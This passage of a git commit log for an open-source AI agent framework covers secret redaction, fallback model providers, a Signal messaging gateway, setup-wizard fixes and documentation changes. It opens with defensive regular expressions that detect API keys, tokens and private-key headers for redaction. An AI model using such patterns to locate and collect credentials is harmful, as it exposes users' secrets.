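      re.compile(r"\bsk_(?:live|test)_[A-Za-z0-9]{10,}\b"),  # Stripe secret keys
      re.compile(r"\bhf_[A-Za-z0-9]{20,}\b"),                # HuggingFace
      re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),     # key block header
  ]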
2026-03-09 01:28:27 -07:00
teknium1
12f4800631 docs: add security.redact_secrets as commented config section
Moved redact_secrets out of DEFAULT_CONFIG (it's on by default when
unset) and into the commented sections at the bottom of config.yaml,
alongside fallback_model. Users can see the option and uncomment to
disable.
2026-03-09 01:12:49 -07:00
teknium1
57b48a81ca feat: add config toggle to disable secret redaction
New config option:

  security:
    redact_secrets: false  # default: true

When set to false, API keys, tokens, and passwords are shown in
full in read_file, search_files, and terminal output. Useful for
debugging auth issues where you need to verify the actual key value.

Bridged to both CLI and gateway via HERMES_REDACT_SECRETS env var.
The check is in redact_sensitive_text() itself, so all call sites
(terminal, file tools, log formatter) respect it.
2026-03-09 01:04:33 -07:00
teknium1
7af33accf1 fix: apply secret redaction to file tool outputs
Terminal output was already redacted via redact_sensitive_text() but
read_file and search_files returned raw content. Now both tools
redact secrets before returning results to the LLM.

Based on PR #372 by @teyrebaz33 (closes #363) — applied manually
due to branch conflicts with the current codebase.
2026-03-09 00:49:46 -07:00
teknium1
3214c05e82 Merge PR #369: fix(gateway): add missing UTF-8 encoding to file I/O
Authored by @ch3ronsa. Fixes UnicodeEncodeError/UnicodeDecodeError on
Windows with non-UTF-8 system locales (e.g. Turkish cp1254).

Adds encoding='utf-8' to 10 open() calls across gateway/session.py,
gateway/channel_directory.py, and gateway/mirror.py.
2026-03-09 00:36:38 -07:00
teknium1
4608a7fe4e fix: make skills manifest writes atomic
Uses temp file + fsync + os.replace() to avoid corruption if the
process crashes mid-write. Cleans up temp file on failure, logs
errors at debug level.

Based on PR #335 by @aydnOktay — adapted for the current v2
manifest format (name:hash).
2026-03-08 23:53:57 -07:00
teknium1
af67ea8800 fix: setup wizard overwrites platform_toolsets saved by tools_command 2026-03-08 23:39:04 -07:00
teknium1
37c3dcf551 fix: setup wizard overwrites platform_toolsets saved by tools_command
The wizard and tools_command each loaded their own config dict. When
tools_command saved platform_toolsets (with MoA/HA disabled), the
wizard's final save_config() overwrote it with its own dict that lacked
platform_toolsets entirely — resetting everything to defaults.

Fix: pass the wizard's config dict into tools_command so they share the
same object. Now platform_toolsets survives the wizard's final save.
2026-03-08 23:39:00 -07:00
teknium1
6a49fbb7da fix: correct agentmail skill — API key goes in config.yaml env block
MCP server subprocess env is filtered through _build_safe_env() which
only passes safe baseline vars (PATH, HOME, XDG_*) plus whatever is
explicitly in the config's env: block. Env vars from ~/.hermes/.env
are NOT inherited by MCP subprocesses. The key must go directly in
the config.yaml mcp_servers.agentmail.env section.
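i.e. in config.yaml (server command omitted; key value illustrative):

  mcp_servers:
    agentmail:
      env:
        AGENTMAIL_API_KEY: am_xxxxxxxxxxxx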
2026-03-08 23:34:50 -07:00
teknium1
eb0b01de7b chore: move agentmail skill to optional-skills, add API key docs
AgentMail requires a third-party API key (free tier available, paid
plans from $20/mo) — not appropriate for bundled skills that show
up in every user's system prompt.

Added a Requirements section at the top with clear instructions
to add AGENTMAIL_API_KEY to ~/.hermes/.env. Streamlined setup steps
to avoid duplicating the key in both .env and config.yaml.
2026-03-08 23:33:05 -07:00
teknium1
5b1528519c Merge PR #330: feat: add AgentMail skill for agent-owned email inboxes
Authored by teyrebaz33. Closes #329.
2026-03-08 23:32:26 -07:00
teknium1
52f92eb689 fix: first-install tool setup shows all providers + skip options 2026-03-08 23:15:20 -07:00
teknium1
7f9dd60c15 fix: first-install tool setup shows all providers + skip options
Three fixes:

1. Web search provider menu now says 'Select Search Provider' and notes
   that a free DuckDuckGo search skill is included if Firecrawl isn't
   desired. Supports custom setup_title/setup_note per TOOL_CATEGORIES.

2. All multi-provider menus (web, browser, TTS) now include a
   'Skip — keep defaults / configure later' option so users can move on.

3. First-install flow now walks through ALL tools with provider options
   (browser, TTS, web, image_gen, etc.), not just ones missing API keys.
   Previously, tools with a free provider (browser/Local, TTS/Edge) were
   silently skipped — users never got to choose between Local vs
   Browserbase or Edge vs ElevenLabs.
2026-03-08 23:15:14 -07:00
teknium1
77da3bbc95 fix: use correct role for summary message in context compressor
The summary message was always injected as 'user' role, which causes
consecutive user messages when the last preserved head message is also
'user'. Some APIs reject this (400 error), and it produces malformed
training data.

Fix: check the role of the last head message and pick the opposite role
for the summary — 'user' after assistant/tool, 'assistant' after user.

Based on PR #328 by johnh4098. Closes #328.
2026-03-08 23:09:04 -07:00
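A sketch of the role-flip rule, with illustrative names:

  def summary_role(head_messages: list[dict]) -> str:
      """Pick the opposite role of the last preserved head message."""
      last_role = head_messages[-1]["role"] if head_messages else "assistant"
      # 'user' after assistant/tool output, 'assistant' after a user turn, so
      # the compacted transcript never has two consecutive user messages.
      return "assistant" if last_role == "user" else "user"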
teknium1
bb489a3903 fix: add first_install flag to tools setup for reliable API key prompting 2026-03-08 23:06:35 -07:00
teknium1
167eb824cb fix: add first_install flag to tools setup for reliable API key prompting
On fresh installs, the multi-level curses menu flow (platform menu →
checklist → loop back → Done) was unreliable — users could end up
skipping API key configuration entirely.

Now the setup wizard passes first_install=True to tools_command(), which:
- Skips the platform selection menu entirely
- Goes straight to the tool checklist
- Prompts for API keys on ALL selected tools that need them
- Linear flow, no loop — impossible to accidentally skip

Returning users (hermes tools / hermes setup tools) get the existing
platform menu loop as before.
2026-03-08 23:06:31 -07:00
teknium1
efb64aee5a fix: default MoA, Home Assistant, RL Training to off for new installs 2026-03-08 22:54:15 -07:00
teknium1
3045e29232 fix: default MoA, Home Assistant, and RL Training to off for new installs
New users shouldn't have these pre-checked in the tool configurator:
- MoA requires OpenRouter API key and is a niche feature
- Home Assistant requires HASS_TOKEN and most users don't have one
- RL Training requires Tinker + WandB keys

They're still available in the checklist to enable, just not pre-selected.
Existing users with saved platform_toolsets are unaffected.
2026-03-08 22:54:11 -07:00
teknium1
5d7d76025a fix: setup wizard default max iterations 60 → 90 2026-03-08 22:51:02 -07:00
teknium1
e6c829384e fix: setup wizard shows 60 as default max iterations, should be 90
AIAgent.__init__ defaults to max_iterations=90 but setup_agent_settings()
fell back to '60' when HERMES_MAX_ITERATIONS wasn't set.
2026-03-08 22:50:58 -07:00
teknium1
5c658a416c Merge PR #748: fix: first-time setup skips API key prompts + install.sh sudo on WSL 2026-03-08 22:03:12 -07:00
teknium1
a130aa8165 fix: first-time setup skips API key prompts + install.sh sudo on WSL
Two issues fixed:

1. (Critical) hermes setup tools / hermes tools: On first-time setup,
   the tool checklist showed all tools as pre-selected (from the default
   hermes-cli toolset), but after confirming the selection, NO API key
   prompts appeared. This is because the code only prompted for 'newly
   added' tools (added = new_enabled - current_enabled), but since all
   tools were already in the default set, 'added' was always empty.

   Fix: Detect first-time configuration (no platform_toolsets entry in
   config) and check ALL enabled tools for missing API keys, not just
   newly added ones. Returning users still only get prompted for newly
   added tools (preserving skip behavior).

2. install.sh: When run via curl|bash on WSL2/Ubuntu, ripgrep and ffmpeg
   install was silently skipped with a confusing 'Non-interactive mode'
   message. The script already uses /dev/tty for the setup wizard, but
   the system package section didn't.

   Fix: Try reading from /dev/tty when available (same pattern as the
   build-tools section and setup wizard). Only truly skip when no
   terminal is available at all (Docker build, CI).
2026-03-08 21:59:39 -07:00
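A sketch of the first-install key-prompt fix, with a hypothetical helper name:

  def tools_needing_key_prompts(new_enabled: set, current_enabled: set,
                                first_install: bool) -> set:
      """On fresh installs, check every enabled tool for missing API keys."""
      if first_install:
          # 'added' is always empty when the default toolset pre-selects everything.
          return set(new_enabled)
      # Returning users are only prompted for newly added tools.
      return new_enabled - current_enabled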
teknium1
35d57ed752 refactor: unified OAuth/API-key credential resolution for fallback
Split fallback provider handling into two clean registries:

  _FALLBACK_API_KEY_PROVIDERS — env-var-based (openrouter, zai, kimi, minimax)
  _FALLBACK_OAUTH_PROVIDERS  — OAuth-based (openai-codex, nous)

New _resolve_fallback_credentials() method handles all three cases
(OAuth, API key, custom endpoint) and returns a uniform (key, url, mode)
tuple. _try_activate_fallback() is now just validation + client build.

Adds Nous Portal as a fallback provider — uses the same OAuth flow
as the primary provider (hermes login), returns chat_completions mode.

OAuth providers get credential refresh for free: the existing 401
retry handlers (_try_refresh_codex/nous_client_credentials) check
self.provider, which is set correctly after fallback activation.

4 new tests (nous activation, nous no-login, codex retained).
27 total fallback tests passing, 2548 full suite.
2026-03-08 21:44:48 -07:00
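A sketch of the uniform resolution, with the registries reduced to the env-var names quoted above; the OAuth token and base-URL lookups are passed in as assumptions:

  import os

  _FALLBACK_API_KEY_PROVIDERS = {
      "openrouter": "OPENROUTER_API_KEY",
      "zai": "ZAI_API_KEY",
      "kimi-coding": "KIMI_API_KEY",
      "minimax": "MINIMAX_API_KEY",
  }
  _FALLBACK_OAUTH_PROVIDERS = {"openai-codex", "nous"}

  def _resolve_fallback_credentials(provider: str, oauth_tokens: dict,
                                    base_urls: dict,
                                    base_url: str | None = None,
                                    api_key_env: str | None = None):
      """Collapse OAuth, API-key, and custom-endpoint cases into (key, url, mode)."""
      if provider in _FALLBACK_OAUTH_PROVIDERS:
          # OAuth providers reuse the saved login session (hermes login).
          mode = "codex_responses" if provider == "openai-codex" else "chat_completions"
          return oauth_tokens.get(provider), base_urls[provider], mode
      if base_url and api_key_env:
          # Custom OpenAI-compatible endpoint via config overrides.
          return os.environ.get(api_key_env), base_url, "chat_completions"
      env_var = _FALLBACK_API_KEY_PROVIDERS[provider]
      return os.environ.get(env_var), base_urls[provider], "chat_completions"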
teyrebaz33
1404f846a7 feat(cli,gateway): add user-defined quick commands that bypass agent loop
Implements config-driven quick commands for both CLI and gateway that
execute locally without invoking the LLM.

Config example (~/.hermes/config.yaml):
  quick_commands:
    limits:
      type: exec
      command: /home/user/.local/bin/hermes-limits
    dn:
      type: exec
      command: echo daily-note

Changes:
- hermes_cli/config.py: add quick_commands: {} default
- cli.py: check quick_commands before skill commands in process_command()
- gateway/run.py: check quick_commands before skill commands in _handle_message()
- tests/test_quick_commands.py: 11 tests covering exec, timeout, unsupported type, missing command, priority over skills

Closes #744
2026-03-09 07:38:06 +03:00
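A sketch of the exec-type dispatch, assuming a hypothetical helper name and a 30s timeout (the real timeout value is not stated here):

  import shlex
  import subprocess

  def try_quick_command(name: str, config: dict) -> str | None:
      """Run a config-defined quick command locally; None means fall through to skills."""
      entry = config.get("quick_commands", {}).get(name)
      if entry is None:
          return None                      # not a quick command: try skill commands next
      if entry.get("type") != "exec":
          return f"Unsupported quick command type: {entry.get('type')}"
      command = entry.get("command")
      if not command:
          return "Quick command has no command configured."
      result = subprocess.run(shlex.split(command), capture_output=True,
                              text=True, timeout=30)
      return result.stdout or result.stderr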
teknium1
5785bd3272 feat: add openai-codex as fallback provider
Codex OAuth uses a different auth flow (OAuth tokens, not env vars)
and a different API mode (codex_responses, not chat_completions).
The fallback now handles this specially:

- Resolves credentials via resolve_codex_runtime_credentials()
- Sets api_mode to codex_responses
- Fails gracefully if no Codex OAuth session exists

Also added to the commented-out config.yaml example.
2 new tests (codex activation + graceful failure).
2026-03-08 21:34:15 -07:00
teknium1
cf9482984e docs: condense AGENTS.md from 927 to 242 lines
AGENTS.md is read by AI agents in their context window. Every line
costs tokens. The previous version had grown to 927 lines with
user-facing documentation that duplicates website/docs/:

Removed (belongs in website/docs/, not agent context):
- Full CLI commands table (50 lines)
- Full gateway slash commands list (20 lines)
- Messaging gateway setup, config examples, security details
- DM pairing system details
- Event hooks format and examples
- Tool progress notification details
- Full environment variables reference
- Auxiliary model configuration section (60 lines)
- Background process management details
- Trajectory format details
- Batch processing CLI usage
- Skills system directory tree and hub details
- Dangerous command approval flow details
- Platform toolsets listing

Kept (essential for agents modifying code):
- Project structure (condensed to key files only)
- File dependency chain
- AIAgent class signature and loop mechanics
- How to add tools (3 files, full pattern)
- How to add config (config.yaml + .env patterns)
- How to add CLI commands
- Config loader table (two separate systems)
- Prompt caching policy (critical constraint)
- All known pitfalls
- Test commands
2026-03-08 21:33:10 -07:00
teknium1
67275641f8 fix: unify gateway session hygiene with agent compression config
The gateway had a SEPARATE compression system ('session hygiene')
with hardcoded thresholds (100k tokens / 200 messages) that were
completely disconnected from the model's context length and the
user's compression config in config.yaml. This caused premature
auto-compression on Telegram/Discord — triggering at ~60k tokens
(from the 200-message threshold) or inconsistent token counts.

Changes:
- Gateway hygiene now reads model name from config.yaml and uses
  get_model_context_length() to derive the actual context limit
- Compression threshold comes from compression.threshold in
  config.yaml (default 0.85), same as the agent's ContextCompressor
- Removed the message-count-based trigger (was redundant and caused
  false positives in tool-heavy sessions)
- Removed the undocumented session_hygiene config section — the
  standard compression.* config now controls everything
- Env var overrides (CONTEXT_COMPRESSION_THRESHOLD,
  CONTEXT_COMPRESSION_ENABLED) are respected
- Warn threshold is now 95% of model context (was hardcoded 200k)
- Updated tests to verify model-aware thresholds, scaling across
  models, and that message count alone no longer triggers compression

For claude-opus-4.6 (200k context) at 85% threshold: gateway
hygiene now triggers at 170k tokens instead of the old 100k.
2026-03-08 21:30:48 -07:00
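A sketch of the model-aware trigger, with a stand-in for the context-length lookup named above:

  def get_model_context_length(model: str) -> int:
      # Stand-in for the real lookup this commit references.
      return {"claude-opus-4.6": 200_000}.get(model, 128_000)

  def hygiene_trigger_tokens(model: str, compression_cfg: dict) -> int:
      """Derive the compaction trigger from the model's actual context window."""
      threshold = float(compression_cfg.get("threshold", 0.85))
      return int(get_model_context_length(model) * threshold)

  # claude-opus-4.6 at the 0.85 default: 200_000 * 0.85 = 170_000 tokens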
teknium1
3ffaac00dd feat: bell_on_complete — terminal bell when agent finishes
Adds a simple config option to play the terminal bell (\a) when the
agent finishes a response. Useful for long-running tasks — switch to
another window and your terminal will ding when done.

Works over SSH since the bell character propagates through the
connection. Most terminal emulators can be configured to flash the
taskbar, play a sound, or show a visual indicator on bell.

Config (default: off):
  display:
    bell_on_complete: true

Closes #318
2026-03-08 21:30:48 -07:00
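A minimal sketch of the bell hook, assuming the config shape shown above:

  import sys

  def maybe_ring_bell(config: dict) -> None:
      """Emit the BEL character when display.bell_on_complete is true."""
      if config.get("display", {}).get("bell_on_complete", False):
          sys.stdout.write("\a")
          sys.stdout.flush()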
Teknium
816a3ef6f1 Merge pull request #745 from NousResearch/hermes/hermes-f8d56335
feat: browser console tool, annotated screenshots, auto-recording, and dogfood QA skill
2026-03-08 21:29:52 -07:00
teknium1
a8bf414f4a feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.

## New tool: browser_console

Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.

## Enhanced tool: browser_vision(annotate=True)

New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.

## Config: browser.record_sessions

Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default

## Built-in skill: dogfood

Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
   (Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence

Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template

## Tests

21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation

Addresses #315.
2026-03-08 21:28:12 -07:00
teknium1
3b312d45c5 fix: show fallback_model as commented-out YAML example in config
Remove fallback_model from DEFAULT_CONFIG (empty strings were useless
noise). Instead, save_config() appends a commented-out section at the
bottom of config.yaml showing the available providers and example usage.

When the user actually configures fallback_model, it appears as normal
YAML and the comment block is omitted.
2026-03-08 21:25:58 -07:00
teknium1
fcd899f888 docs: add platform integration checklist for new gateway adapters
Comprehensive 16-point checklist covering every integration point
needed when adding a new messaging platform to the gateway. Built
from the Signal integration experience where 7 integration points
were initially missed.

Covers: adapter, config enum, factory, auth maps, session source,
prompt hints, toolsets, cron delivery, send_message tool, cronjob
tool schema, channel directory, status display, setup wizard,
redaction, documentation, and tests.
2026-03-08 21:20:06 -07:00
Teknium
315f3ea429 Merge pull request #740 from NousResearch/hermes/hermes-3cd7c62d
feat: simple fallback model for provider resilience (#737)
2026-03-08 21:16:58 -07:00
teyrebaz33
7241e8784a feat: hermes skills — enable/disable individual skills and categories (#642)
Add interactive skill configuration via `hermes skills` command,
mirroring the existing `hermes tools` pattern.

Changes:
- hermes_cli/skills_config.py (new): skills_command() entry point with
  curses checklist UI + numbered fallback. Supports global and
  per-platform disable lists, individual skill toggle, and category toggle.
- hermes_cli/main.py: register `hermes skills` subcommand
- tools/skills_tool.py: add _is_skill_disabled() and filter disabled
  skills in _find_all_skills(). Resolves platform from argument,
  HERMES_PLATFORM env var, then falls back to global disabled list.

Config schema (config.yaml):
  skills:
    disabled: [skill-a]                 # global
    platform_disabled:
      telegram: [skill-b]               # per-platform override

22 unit tests, 2489 passed, 0 failed.

Closes #642
2026-03-09 07:02:06 +03:00
teknium1
b7d6eae64c fix: Signal adapter parity pass — integration gaps, clawdbot features, env var simplification
Integration gaps fixed (7 files missing Signal):
- cron/scheduler.py: Signal in platform_map (cron delivery was broken)
- agent/prompt_builder.py: PLATFORM_HINTS for Signal (agent knows it's on Signal)
- toolsets.py: hermes-signal toolset + added to hermes-gateway composite
- hermes_cli/status.py: Signal + Slack in platform status display
- tools/send_message_tool.py: Signal example in target description
- tools/cronjob_tools.py: Signal in delivery option docs + schema
- gateway/channel_directory.py: Signal in session-based channel discovery

Clawdbot parity features added to signal.py:
- Self-message filtering: prevents reply loops by checking sender != account
- SyncMessage filtering: ignores sync envelopes (sent transcripts, read receipts)
- Edit message support: reads dataMessage from editMessage envelope
- Mention rendering: replaces \uFFFC placeholders with @identifier text
- Jitter in SSE reconnection backoff (20% randomization, prevents thundering herd)

Env var simplification (7 → 4):
- Removed SIGNAL_DM_POLICY (DM auth follows standard platform pattern via
  SIGNAL_ALLOWED_USERS + DM pairing, same as Telegram/Discord)
- Removed SIGNAL_GROUP_POLICY (derived from SIGNAL_GROUP_ALLOWED_USERS:
  not set = disabled, set with IDs = allowlist, set with * = open)
- Removed SIGNAL_DEBUG (was setting root logger, removed entirely)
- Remaining: SIGNAL_HTTP_URL, SIGNAL_ACCOUNT (required),
  SIGNAL_ALLOWED_USERS, SIGNAL_GROUP_ALLOWED_USERS (optional)

Updated all docs (website, AGENTS.md, signal.md) to match.
2026-03-08 21:00:21 -07:00
teknium1
b3765c28d0 fix: restrict fallback providers to actual hermes providers
Remove hallucinated providers (openai, deepseek, together, groq,
fireworks, mistral, gemini, nous) from the fallback provider map.
These don't exist in hermes-agent's provider system.

The real supported providers for fallback are:
  openrouter   (OPENROUTER_API_KEY)
  zai          (ZAI_API_KEY)
  kimi-coding  (KIMI_API_KEY)
  minimax      (MINIMAX_API_KEY)
  minimax-cn   (MINIMAX_CN_API_KEY)

For any other OpenAI-compatible endpoint, users can use the
base_url + api_key_env overrides in the config.

Also adds Kimi User-Agent header for kimi fallback (matching
the main provider system).
2026-03-08 20:49:55 -07:00
teknium1
4cfb66bac2 docs: list all supported fallback providers with env var names
The config comment now shows the complete list of built-in providers
that the fallback system supports, each with the env var it reads
for the API key. Also clarifies that custom OpenAI-compatible endpoints
work via base_url + api_key_env.
2026-03-08 20:42:54 -07:00
teknium1
0c4cff352a docs: add Signal messenger documentation across all doc surfaces
- website/docs/user-guide/messaging/signal.md: Full setup guide with
  prerequisites, step-by-step instructions, access policies, features,
  troubleshooting, security notes, and env var reference
- website/docs/user-guide/messaging/index.md: Added Signal to architecture
  diagram, platform toolset table, security examples, and Next Steps links
- website/docs/reference/environment-variables.md: All 7 SIGNAL_* env vars
- README.md: Signal in feature table and documentation table
- AGENTS.md: Signal in gateway description and env var config section
2026-03-08 20:42:04 -07:00
teknium1
503269b85a chore: remove stale docs/ directory
All documentation migrated to website/docs/ (Docusaurus). The docs/
directory only contained:
- README.md: redirect saying 'docs moved to website' (redundant)
- send_file_integration_map.md: internal engineering notes, unreferenced
  by any file in the codebase

The landing page at landingpage/ is still actively used by the
deploy-site.yml GitHub Actions workflow.
2026-03-08 20:41:47 -07:00
teknium1
161436cfdd feat: simple fallback model for provider resilience
When the primary model/provider fails after retries (rate limit, overload,
auth errors, connection failures), Hermes automatically switches to a
configured fallback model for the remainder of the session.

Config (in ~/.hermes/config.yaml):

  fallback_model:
    provider: openrouter
    model: anthropic/claude-sonnet-4

Supports all major providers: OpenRouter, OpenAI, Nous, DeepSeek, Together,
Groq, Fireworks, Mistral, Gemini — plus custom endpoints via base_url and
api_key_env overrides.

Design principles:
- Dead simple: one fallback model, not a chain
- One-shot: switches once, doesn't ping-pong back
- Zero new dependencies: uses existing OpenAI client
- Minimal code: ~100 lines in run_agent.py, ~5 lines in cli.py/gateway
- Three trigger points: max retries exhausted, non-retryable client errors,
  and invalid response exhaustion

Does NOT trigger on context overflow or payload-too-large errors (those
are handled by the existing compression system).

Addresses #737.

25 new tests, 2492 total passing.
2026-03-08 20:22:33 -07:00
teknium1
24f549a692 feat: add Signal messenger gateway platform (#405)
Complete Signal adapter using signal-cli daemon HTTP API.
Based on PR #268 by ibhagwan, rebuilt on current main with bug fixes.

Architecture:
- SSE streaming for inbound messages with exponential backoff (2s→60s)
- JSON-RPC 2.0 for outbound (send, typing, attachments, contacts)
- Health monitor detects stale SSE connections (120s threshold)
- Phone number redaction in all logs and global redact.py

Features:
- DM and group message support with separate access policies
- DM policies: pairing (default), allowlist, open
- Group policies: disabled (default), allowlist, open
- Attachment download with magic-byte type detection
- Typing indicators (8s refresh interval)
- 100MB attachment size limit, 8000 char message limit
- E.164 phone + UUID allowlist support

Integration:
- Platform.SIGNAL enum in gateway/config.py
- Signal in _is_user_authorized() allowlist maps (gateway/run.py)
- Adapter factory in _create_adapter() (gateway/run.py)
- user_id_alt/chat_id_alt fields in SessionSource for UUIDs
- send_message tool support via httpx JSON-RPC (not aiohttp)
- Interactive setup wizard in 'hermes gateway setup'
- Connectivity testing during setup (pings /api/v1/check)
- signal-cli detection and install guidance

Bug fixes from PR #268:
- Timestamp reads from envelope_data (not outer wrapper)
- Uses httpx consistently (not aiohttp in send_message tool)
- SIGNAL_DEBUG scoped to signal logger (not root)
- extract_images regex NOT modified (preserves group numbering)
- pairing.py NOT modified (no cross-platform side effects)
- No dual authorization (adapter defers to run.py for user auth)
- Wildcard uses set membership ('*' in set, not list equality)
- .zip default for PK magic bytes (not .docx)

No new Python dependencies — uses httpx (already core).
External requirement: signal-cli daemon (user-installed).

Tests: 30 new tests covering config, init, helpers, session source,
phone redaction, authorization, and send_message integration.

Co-authored-by: ibhagwan <ibhagwan@users.noreply.github.com>
2026-03-08 20:20:35 -07:00
Teknium
7a8778ac73 Merge pull request #732 from NousResearch/hermes/hermes-2cb83eed
docs: comprehensive AGENTS.md audit and corrections
2026-03-08 20:10:32 -07:00
teknium1
763c6d104d fix: unify gateway session hygiene with agent compression config
The gateway had a SEPARATE compression system ('session hygiene')
with hardcoded thresholds (100k tokens / 200 messages) that were
completely disconnected from the model's context length and the
user's compression config in config.yaml. This caused premature
auto-compression on Telegram/Discord — triggering at ~60k tokens
(from the 200-message threshold) or inconsistent token counts.

Changes:
- Gateway hygiene now reads model name from config.yaml and uses
  get_model_context_length() to derive the actual context limit
- Compression threshold comes from compression.threshold in
  config.yaml (default 0.85), same as the agent's ContextCompressor
- Removed the message-count-based trigger (was redundant and caused
  false positives in tool-heavy sessions)
- Removed the undocumented session_hygiene config section — the
  standard compression.* config now controls everything
- Env var overrides (CONTEXT_COMPRESSION_THRESHOLD,
  CONTEXT_COMPRESSION_ENABLED) are respected
- Warn threshold is now 95% of model context (was hardcoded 200k)
- Updated tests to verify model-aware thresholds, scaling across
  models, and that message count alone no longer triggers compression

For claude-opus-4.6 (200k context) at 85% threshold: gateway
hygiene now triggers at 170k tokens instead of the old 100k.
2026-03-08 20:08:02 -07:00
teknium1
4d7d9d9715 fix: add diagnostic logging to browser tool for errors.log
All failure paths in _run_browser_command now log at WARNING level,
which means they automatically land in ~/.hermes/logs/errors.log
(the persistent error log captures WARNING+).

What's now logged:
- agent-browser CLI not found (warning)
- Session creation failure with task ID (warning)
- Command entry with socket_dir path and length (debug)
- Non-zero return code with stderr (warning)
- Non-JSON output from agent-browser (warning — version mismatch/crash)
- Command timeout with task ID and socket path (warning)
- Unexpected exceptions with full traceback (warning + exc_info)
- browser_vision: which model is used and screenshot size (debug)
- browser_vision: LLM analysis failure with full traceback (warning)

Also fixed: _get_vision_model() was called twice in browser_vision —
now called once and reused.
2026-03-08 19:54:41 -07:00
teknium1
a9c35f9175 docs: comprehensive rewrite of all messaging platform setup guides
All four platform guides rewritten from thin ~60-line summaries to
comprehensive step-by-step setup guides with current (2025-2026) info:

telegram.md (74 → 196 lines):
- Full BotFather walkthrough with customization commands
- Privacy mode section with critical group chat gotcha
- Multiple user ID discovery methods
- Voice message setup (Whisper STT + TTS bubbles + ffmpeg)
- Group chat usage patterns and admin mode
- Recent Bot API features (privacy policy requirement, streaming)
- Troubleshooting table (6 issues)

discord.md (57 → 260 lines):
- Complete Developer Portal walkthrough (application, bot, intents)
- Detailed Privileged Gateway Intents section with warning about
  Message Content Intent being #1 failure cause
- Invite URL generation via Installation tab (new 2024) and manual
- Permission integer calculation (274878286912 recommended)
- Developer Mode user ID discovery
- Bot behavior documentation (DMs, channels, no-prefix)
- Troubleshooting table (6 issues)

slack.md (57 → 214 lines):
- Warning about classic Slack apps deprecated since March 2025
- Full scope tables (required + optional) with purposes
- Socket Mode setup with App-Level Token (xapp-)
- Event Subscriptions configuration
- User ID discovery via profile
- Two-token architecture explained (xoxb- + xapp-)
- Troubleshooting table

whatsapp.md (77 → 193 lines):
- Clarified whatsapp-web.js (not Business API) with ban risk warnings
- Linux Chromium dependencies (Debian + Fedora)
- Setup wizard QR code scanning workflow
- Session persistence with LocalAuth
- Second phone number options with cost table
- WhatsApp Web protocol update warnings
- Troubleshooting table (7 issues)

Docusaurus build verified clean.
2026-03-08 19:51:42 -07:00
teknium1
37752ff1ac feat: bell_on_complete — terminal bell when agent finishes
Adds a simple config option to play the terminal bell (\a) when the
agent finishes a response. Useful for long-running tasks — switch to
another window and your terminal will ding when done.

Works over SSH since the bell character propagates through the
connection. Most terminal emulators can be configured to flash the
taskbar, play a sound, or show a visual indicator on bell.

Config (default: off):
  display:
    bell_on_complete: true

Closes #318
2026-03-08 19:41:17 -07:00
teknium1
31b84213e4 docs: add Guides & Tutorials section, restructure sidebar
New documentation pages (1,823 lines):
- getting-started/learning-path.md: 3-tier learning path table
  (beginner/intermediate/advanced) + use-case-based navigation
- guides/tips.md: Tips & Best Practices quick-wins collection
  covering prompting, CLI power user tips, context files, memory,
  performance/cost, messaging, and security
- guides/daily-briefing-bot.md: End-to-end tutorial building an
  automated daily news briefing with cron + web search + messaging
- guides/team-telegram-assistant.md: Full walkthrough setting up
  a team Telegram bot with BotFather, gateway, DM pairing, and
  production deployment
- guides/python-library.md: Guide to using AIAgent as a Python
  library — basic usage, multi-turn conversations, toolset config,
  trajectories, custom prompts, and integration examples (FastAPI,
  Discord bot, CI/CD)
- reference/faq.md: Centralized FAQ (8 questions) + troubleshooting
  guide (6 categories, 18 specific issues) with problem/cause/solution
  format

Sidebar restructure:
- Added 'Guides & Tutorials' as new top-level section
- Reorganized flat Features list (17 items) into 5 subcategories:
  Core Features, Automation, Web & Media, Integrations, Advanced
- Added FAQ to Reference section
- Updated index.md quick links table

Docusaurus build verified clean.
2026-03-08 19:37:34 -07:00
teknium1
2036c22f88 fix: macOS browser/code-exec socket path exceeds Unix limit (#374)
macOS sets TMPDIR to /var/folders/xx/.../T/ (~51 chars). Combined with
agent-browser session names, socket paths reach 121 chars — exceeding
the 104-byte macOS AF_UNIX limit. This causes 'Screenshot file was not
created' errors and silent browser_vision failures on macOS.

Fix: use /tmp/ on macOS (symlink to /private/tmp, sticky-bit protected).
On Linux, tempfile.gettempdir() already returns /tmp — no behavior change.

Changes in browser_tool.py:
- Add _socket_safe_tmpdir() helper — returns /tmp on macOS, gettempdir()
  elsewhere
- Replace all 3 tempfile.gettempdir() calls for socket dirs
- Set mode=0o700 on socket dirs for privacy (was using default umask)
- Guard vision/text client init with try/except — a broken auxiliary
  config no longer prevents the entire browser_tool module from importing
  (which would disable all 10 browser tools, not just vision)
- Improve screenshot error messages with mode info and diagnostic hints
- Don't delete screenshots when LLM analysis fails — the capture was
  valid, only the vision API call failed. Screenshots are still cleaned
  up by the existing 24-hour _cleanup_old_screenshots mechanism.

Changes in code_execution_tool.py:
- Same /tmp fix for RPC socket path (was 103 chars on macOS — one char
  from the 104-byte limit)
2026-03-08 19:31:23 -07:00
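A sketch of the helper as described:

  import sys
  import tempfile

  def _socket_safe_tmpdir() -> str:
      """Return a tmp dir short enough for AF_UNIX socket paths (104 bytes on macOS)."""
      if sys.platform == "darwin":
          # macOS TMPDIR (/var/folders/xx/.../T/) is ~51 chars on its own; /tmp is a
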